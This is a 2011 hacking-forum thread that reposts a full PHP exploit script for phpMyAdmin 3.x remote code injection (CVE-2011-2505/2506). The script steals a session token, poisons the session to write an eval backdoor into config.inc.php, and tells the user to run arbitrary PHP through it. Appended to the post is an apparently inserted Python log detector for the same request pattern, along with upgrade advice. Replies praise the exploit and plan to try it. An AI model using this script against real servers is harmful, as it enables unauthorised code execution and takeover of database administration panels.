.:: Blackc0de Forum ::.
 phpMyAdmin 3.x Swekey Remote Code Injection Exploit

Copper (Lamer)

Subject: phpMyAdmin 3.x Swekey Remote Code Injection Exploit
Posted: Sat Jul 23, 2011 3:37 pm

Quote :
<?php /*
# Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit
# Date: 2011-07-09
# Author: Mango of ha.xxor.se
# Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1
# CVE : CVE-2011-2505, CVE-2011-2506
# Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt
# Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html
*/
echo php_sapi_name()!=='cli'?'<pre>':'';?>
phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1
Remote Code Injection
http://ha.xxor.se

Use responsibly.

<?php echo php_sapi_name()!=='cli'?'</pre>':'';

if(php_sapi_name()==='cli'){
if(!isset($argv[1])){
output(" Usage\n ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2");
killme();
}
$pmaurl = $argv[1];
}else{
$pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:'';
}
$code = 'foreach($_GET as $k=>$v)if($k==="eval")eval($v);';
$cookie = null;
$token = null;
if(!function_exists('curl_init')){
output('[!] Fatal error. Need cURL!');
killme();
}
$ch = curl_init();
$debug = 0;
if(php_sapi_name()!=='cli'){
?>
<form method=post>
URL: <input name=url value="<?php echo htmlspecialchars($pmaurl);?>"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/>
<input name=submit type=submit value=?>
</form>
<pre>
<?php
if(!isset($_REQUEST['submit']))killme(true);
}

output("[i] Running...");

// Start a session and get a token
curl_setopt_array($ch, array(
CURLOPT_URL => $pmaurl.'/setup/index.php',
CURLOPT_HEADER => 1,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_TIMEOUT => 4,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false
));
output("[*] Contacting server to retrieve session cookie and token.");

$result = curl_exec($ch);
if(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){
output("[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url.");
killme();
}
if(!$result){
output("[!] cURL error:".curl_error($ch));
killme();
}
if(false !== strpos($result, 'Cannot load or save configuration')){
output("[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exist.");
killme();
}

// Extract cookie
preg_match('/phpMyAdmin=([^;]+)/', $result, $matches);
$cookie = $matches[1];
output("[i] Cookie:".$cookie);
// Extract token
preg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches);
$token = $matches[2];
output("[i] Token:".$token);

// Poison _SESSION variable
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token);
curl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie);
output("[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.");
if(!$result = curl_exec($ch)){
output("[!] cURL error:".curl_error($ch));
killme();
}

//echo htmlspecialchars($result,ENT_QUOTES);

// Save file
curl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token);
output("[*] Contacting server to make it save the injected code to a file.");
if(!$result = curl_exec($ch)){
output("[!] cURL error:".curl_error($ch));
killme();
}

//echo htmlspecialchars($result,ENT_QUOTES);

curl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);');
curl_setopt($ch, CURLOPT_POST, 0);
output("[*] Contacting server to test if the injected code executes.");
if(!$result = curl_exec($ch)){
output("[!] cURL error:".curl_error($ch));
killme();
}
if(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){
output("[!] Code injection successful. This instance of phpMyAdmin is vulnerable!");
output("[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';");
}else{
output("[!] Code injection failed. This instance of phpMyAdmin does not appear to be vulnerable.");
}


curl_close($ch);

function output($msg){
echo php_sapi_name()!=='cli'?htmlspecialchars("$msg\n",ENT_QUOTES):"$msg\n";
flush();
}

function killme(){
output("[*] Exiting...");
echo php_sapi_name()!=='cli'?'</pre>':''; // close the <pre> opened for browser output
die();
}

echo php_sapi_name()!=='cli'?'</pre>':'';?>
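A defender-side check for the request sequence the script above issues (superglobal-named query parameter, POST to setup/config.php, direct fetch of config/config.inc.php), as an added example that is not part of the original post. The log lines, the "/pma" install path, the combined log format and the indicator names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines (combined log format, documentation addresses, "/pma" path assumed).
SAMPLE_LOG = """\
192.0.2.10 - - [23/Jul/2011:15:40:01 +0000] "GET /pma/setup/index.php HTTP/1.1" 200 5120
192.0.2.10 - - [23/Jul/2011:15:40:02 +0000] "GET /pma/?_SESSION%5BConfigFile%5D%5BServers%5D%5Bx%5D%5Bport%5D=0&session_to_unset=x&token=0123456789abcdef0123456789abcdef HTTP/1.1" 200 9000
192.0.2.10 - - [23/Jul/2011:15:40:03 +0000] "POST /pma/setup/config.php HTTP/1.1" 200 300
192.0.2.10 - - [23/Jul/2011:15:40:04 +0000] "GET /pma/config/config.inc.php?eval=PLACEHOLDER HTTP/1.1" 200 32
198.51.100.7 - - [23/Jul/2011:15:41:00 +0000] "GET /pma/index.php?db=shop&token=0123456789abcdef0123456789abcdef HTTP/1.1" 200 7000
198.51.100.7 - - [23/Jul/2011:15:41:05 +0000] "GET /pma/setup/index.php HTTP/1.1" 200 5120
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')
# A request parameter named after a PHP superglobal is never legitimate input.
SUPERGLOBAL_KEY = re.compile(r'^(_(SESSION|GET|POST|COOKIE|SERVER|REQUEST|FILES|ENV)|GLOBALS)\[')

def classify(method, target):
    """Return the set of indicator names one request matches."""
    url = urlsplit(target)
    keys = [k for k, _ in parse_qsl(url.query, keep_blank_values=True)]  # decodes %5B to [
    hits = set()
    if any(SUPERGLOBAL_KEY.match(k) for k in keys):
        hits.add("superglobal_param")
    if "session_to_unset" in keys:
        hits.add("session_to_unset")
    if method == "POST" and url.path.endswith("/setup/config.php"):
        hits.add("setup_save")
    if url.path.endswith("/config/config.inc.php"):
        hits.add("config_direct")  # generated config file requested over HTTP
    return hits

def scan(log_text):
    """Map client address to the union of indicators seen from it."""
    seen = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        hits = classify(m.group(2), m.group(3)) if m else set()
        if hits:
            seen.setdefault(m.group(1), set()).update(hits)
    return seen

def high_confidence(seen):
    """Clients that poisoned the session, saved the config and then fetched it."""
    need = {"superglobal_param", "setup_save", "config_direct"}
    return sorted(ip for ip, hits in seen.items() if need <= hits)
```

The post's own header gives the fixed releases (3.3.10.2 and 3.4.3.1), and the script gives up when setup/index.php returns 404 or the web-writable config/ folder does not exist, so upgrading and removing both after installation closes this path.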
BumiayuKita (Administrator)

Subject: Re: phpMyAdmin 3.x Swekey Remote Code Injection Exploit
Posted: Sat Jul 23, 2011 6:08 pm

Nice, nice, great stuff boss... asking permission to learn from this.
http://aljinet.blogspot.com
Banditcode (Top Nubie)

Subject: Re: phpMyAdmin 3.x Swekey Remote Code Injection Exploit
Posted: Fri Aug 12, 2011 2:27 am

I'll try it out first, bro, but why does it look a bit messy?